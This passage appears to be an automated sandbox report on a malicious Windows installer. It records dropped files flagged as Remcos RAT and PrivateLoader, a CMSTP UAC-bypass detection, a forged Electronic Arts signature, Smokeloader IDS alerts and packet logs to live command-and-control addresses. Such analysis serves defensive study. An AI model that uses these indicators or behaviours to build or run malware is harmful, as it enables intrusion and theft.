                                                                                                                                                                                                                                SHA1:87568DBF15EC652132892D6F222C2D0C47DAD44A
                                                                                                                                                                                                                                SHA-256:8B691CA989510FC11A91665593B98C42B9DF5FD1982F2F16D5194121F12C1A27
                                                                                                                                                                                                                                SHA-512:E61B19E0547BA6AA6753E1DAEC17B804A608BF478EEAED7E6EAE65640F874EA66D011837C49283C2985778CAF433345C45079CF4C09658FF9751D060CD6F9A00
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~...R..~...r..~...j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..~................PE..L...[1.e.................r...........I............@.......................... ...........................................................K.......................;..@...8...........................x...@............................................text...uq.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....K.......L..................@..@.reloc...;.......<...P..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\wsruwii

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):947288
                                                                                                                                                                                                                                Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Entropy (8bit):7.868067677506233
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:Og1SeeXcB2.exe
                                                                                                                                                                                                                                File size:795'405 bytes
                                                                                                                                                                                                                                MD5:150e9ffdac7f2361c2efa735929aa268
                                                                                                                                                                                                                                SHA1:3ed43e5fb5cd202d91fe31c4a0f8674e5fdb0759
                                                                                                                                                                                                                                SHA256:d54259b35ece6e39b159317128bfd62f88abbaadd92537379c4bae078e82fe69
                                                                                                                                                                                                                                SHA512:a56ef522fab3213f2f1d5a15d92615f0a039bf8f8c113e36e38f254b6d58185e5aa0449384d15ac52f1f6ac8d07159ac05d245926fba14ac61462e0911cb39a3
                                                                                                                                                                                                                                SSDEEP:24576:pMwUwtgszGQgXxHjejMOlF3NdRruHycftxFA:pMwhd0SZlp/YtTA
                                                                                                                                                                                                                                TLSH:4A0512F2AB209C7EFD57057E11334E721A67FD6A12940A2A315DF4256A3230245FEECB
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:baf062fc9efae2c0

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x40348f
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x60FC9193 [Sat Jul 24 22:17:55 2021 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                • 04/05/2023 01:00:00 07/05/2026 00:59:59
                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                                                                                                                                                                                                                Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                                                                                                                                                                                                                Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                                                                                                                                                                                                                Serial:0671352DC4C103B70AE725E954486374

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                                                                push 00008001h
                                                                                                                                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                call dword ptr [004080CCh]
                                                                                                                                                                                                                                call dword ptr [004080D0h]
                                                                                                                                                                                                                                and eax, BFFFFFFFh
                                                                                                                                                                                                                                cmp ax, 00000006h
                                                                                                                                                                                                                                mov dword ptr [0042A22Ch], eax
                                                                                                                                                                                                                                je 00007FC2810BC923h
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                call 00007FC2810BFC11h
                                                                                                                                                                                                                                cmp eax, ebx
                                                                                                                                                                                                                                je 00007FC2810BC919h
                                                                                                                                                                                                                                push 00000C00h
                                                                                                                                                                                                                                call eax
                                                                                                                                                                                                                                mov esi, 004082B0h
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                call 00007FC2810BFB8Bh
                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                call dword ptr [00408154h]
                                                                                                                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                                jne 00007FC2810BC8FCh
                                                                                                                                                                                                                                push 0000000Bh
                                                                                                                                                                                                                                call 00007FC2810BFBE4h
                                                                                                                                                                                                                                push 00000009h
                                                                                                                                                                                                                                call 00007FC2810BFBDDh
                                                                                                                                                                                                                                push 00000007h
                                                                                                                                                                                                                                mov dword ptr [0042A224h], eax
                                                                                                                                                                                                                                call 00007FC2810BFBD1h
                                                                                                                                                                                                                                cmp eax, ebx
                                                                                                                                                                                                                                je 00007FC2810BC921h
                                                                                                                                                                                                                                push 0000001Eh
                                                                                                                                                                                                                                call eax
                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                je 00007FC2810BC919h
                                                                                                                                                                                                                                or byte ptr [0042A22Fh], 00000040h
                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                call dword ptr [00408038h]
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                call dword ptr [00408298h]
                                                                                                                                                                                                                                mov dword ptr [0042A2F8h], eax
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                push 000002B4h
                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                push 004216C8h
                                                                                                                                                                                                                                call dword ptr [0040818Ch]
                                                                                                                                                                                                                                push 0040A2C8h

                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x11790.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xbfaa50x2868
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x10000x64110x66001be075c408f39c844a297d85521f5b93False0.6545266544117647data6.40243296676441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .data0xa0000x203380x60092925084f722469459e6111e8ee4a9d0False0.5013020833333334data4.020801365171916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .ndata0x2b0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .rsrc0x3b0000x117900x1180064d362b9eac2bf15bf326d75876c51c1False0.18024553571428573data4.7226999015624225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_ICON0x3b1900x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.17041279136525433
                                                                                                                                                                                                                                RT_DIALOG0x4c1b80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                RT_DIALOG0x4c2b80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                RT_DIALOG0x4c3d80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                RT_GROUP_ICON0x4c4380x14dataEnglishUnited States1.15
                                                                                                                                                                                                                                RT_MANIFEST0x4c4500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                                                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                                                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                                                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                05/08/24-16:41:19.549710TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:22.482663TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:03.912735TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:06.812550TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:21.026860TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:25.414325TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:05.348624TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:08.297665TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                05/08/24-16:41:23.944554TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.4179.159.229.64

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                May 8, 2024 16:40:10.417942047 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.417970896 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:10.418129921 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.433727026 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.433773994 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:10.775475025 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:10.775563955 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.844933987 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.844948053 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:10.845236063 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:10.845293045 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.849172115 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:10.892119884 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:11.810961962 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:11.811039925 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:11.811054945 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:11.811067104 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:11.811110973 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:11.848439932 CEST49731443192.168.2.4104.21.79.229
                                                                                                                                                                                                                                May 8, 2024 16:40:11.848460913 CEST44349731104.21.79.229192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:03.562269926 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912379980 CEST8049739179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912492037 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912734985 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912771940 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:04.266726017 CEST8049739179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:04.977279902 CEST8049739179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:04.987595081 CEST8049739179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:04.987684965 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:04.988848925 CEST4973980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:04.992517948 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:05.342669010 CEST8049739179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348376989 CEST8049740179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348449945 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348623991 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348661900 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:05.699552059 CEST8049740179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.447591066 CEST8049740179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.447618961 CEST8049740179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.447824955 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.448762894 CEST4974080192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.451694012 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812247038 CEST8049740179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812275887 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812400103 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812550068 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812573910 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.163414955 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.918659925 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923542023 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923702955 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923702955 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.926459074 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.280407906 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:08.296940088 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297030926 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297665119 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297687054 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.652601004 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.417098045 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420001984 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420074940 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420120001 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:09.773686886 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450011015 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450052023 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450210094 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450504065 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450512886 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.118464947 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.118597984 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120217085 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120229006 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120506048 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.131782055 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.176116943 CEST4434974365.108.69.93192.168.2.4
